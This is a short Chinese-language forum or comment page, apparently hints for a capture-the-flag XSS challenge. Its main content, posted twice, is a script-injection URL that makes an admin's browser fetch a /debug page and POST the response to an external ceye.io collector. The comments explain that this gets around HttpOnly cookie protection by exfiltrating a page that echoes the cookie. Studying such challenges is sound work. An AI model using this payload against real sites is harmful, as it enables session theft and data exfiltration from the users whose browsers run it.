http://82.157.146.43:10973/zombie?show=<script>fetch('http://82.157.146.43:10973/debug').then(data => { fetch('http://xxxx.ceye.io',{method: 'POST', body: data}) })</script>
httponly禁止了js读取cookie,要考虑绕过。由于debug页面的响应包含cookie,那就让后台管理访问debug页面,然后将页面响应回传。要注意js编码和要对页面响应内容编码。
...
评论
vincentshine 1月前
举报
http://82.157.146.43:10973/zombie?show=<script>fetch('http://82.157.146.43:10973/debug').then(data => { fetch('http://xxxx.ceye.io',{method: 'POST', body: data}) })</script>
justsosoloveyou 1年前
举报
httponly禁止了js读取cookie,要考虑绕过。由于debug页面的响应包含cookie,那就让后台管理访问debug页面,然后将页面响应回传。要注意js编码和要对页面响应内容编码。